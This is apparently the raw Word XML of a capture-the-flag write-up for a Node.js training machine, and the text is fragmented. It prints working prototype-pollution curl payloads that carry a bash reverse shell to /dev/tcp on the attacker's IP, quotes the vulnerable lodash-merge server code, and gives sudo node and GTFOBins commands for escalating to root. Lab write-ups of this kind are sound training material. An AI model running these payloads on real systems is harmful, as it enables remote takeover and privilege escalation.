          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to trigger our payload. However, to do that we must be authenticated → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"auth":{"name": "guest", "password": "guest"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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the payload will look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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-X PUT http://&lt;site&gt;:3000/api/ -d curl -X PUT http://&lt;site&gt;:3000/api/ -d '{"message":{"__proto__":{"execPath":"/bin/bash","execArgv":["-c","bash -i &gt;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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/dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1"]}},"auth":{"name": "guest", "password": "guest"}}' -H "Content-Type: application/json"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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app.put('/api/', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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const user = findUser(req.body.auth || {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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(!user) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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res.status(403).send({ok: false, error: 'Access denied'});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8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const message = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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icon: '😈',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8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_.merge(message, req.body.message, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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id: lastId++,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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timestamp: Date.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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userName: user.name,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8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messages.push(message);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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res.send({ok: true});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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9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-X POST http://&lt;site&gt;:3000/api/store -d '{"message":{"__proto__":{"execPath":"/bin/bash","execArgv":["-c","bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1"]}},"auth":{"name": "guest", "password": "guest"}}' -H "Content-Type: application/json"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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app.post('/api/store', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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const user = findUser(req.body.auth || {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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(!user) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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res.status(403).send({ok: false, error: 'Access denied'});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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9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var child = fork('store');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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child.send(messages);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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child.on('message', function(m) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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console.log('received: ' + m);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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res.send(JSON.stringify(m));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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9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9F">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A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A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03400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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82700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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requests, we receive the connection =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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44700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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5x0cjjbc6pc" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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A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A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A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A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A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05000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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f2echbpbmgsc" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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wsij9ufb9teq" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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ijpwsyuzvouj" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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68500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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execute the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">node</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binary with root privileges without a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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node | GTFOBins</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">It can be used to break out from restricted environments by spawning an interactive system shell. It can send back a reverse shell to a listening attacker to open remote network access. Run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -l -p 12345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the attacker machine to receive the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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If the binary is allowed to be executed as superuser via sudo, it will not drop elevated privileges and can be used to access the file system, escalate, or maintain privileged access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/node/#sudo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1905000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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sectPr>
      <w:headerReference r:id="rId33" w:type="default"/>
      <w:headerReference r:id="rId34" w:type="first"/>
      <w:headerReference r:id="rId35" w:type="even"/>
      <w:footerReference r:id="rId36" w:type="default"/>
      <w:footerReference r:id="rId37" w:type="first"/>
      <w:footerReference r:id="rId38"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B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="13"/>
    <w:bookmarkEnd w:id="1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5" name="image14.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14.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BC">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BD">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8" name="image3.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.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UHC v 20</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8.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodejs.org/api/child_process.html#child_processforkmodulepath-args-options" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollu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7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodejs.org/api/child_process.html#child_processforkmodulepath-args-options" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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hyperlink" Target="https://app.hackingclub.com/training/training-machines/4"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hyperlink" Target="https://gtfobins.github.io/gtfobins/node/#sudo" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshell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ApidlKgtZB/S2Cpo0QB4Wey+GA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnZpd3NraHAzNmRyODIOaC53c2h4bHV4eWNzZmsyDmguNHhhYnZ4eGgwcXI4Mg5oLmp6ODNlZXcxYjQxbTIOaC5rNGNjbzJwZXpnbnYyDWguNXgwY2pqYmM2cGMyDmguZjJlY2hicGJtZ3NjMg5oLndzaWo5dWZiOXRlcTIOaC5panB3c3l1enZvdWoyDmguMTc1ZjVjczk0ejBvOAByITFXNURmR01UcklUd1pDUEY1UV9pcGNINlZycmFsbTNr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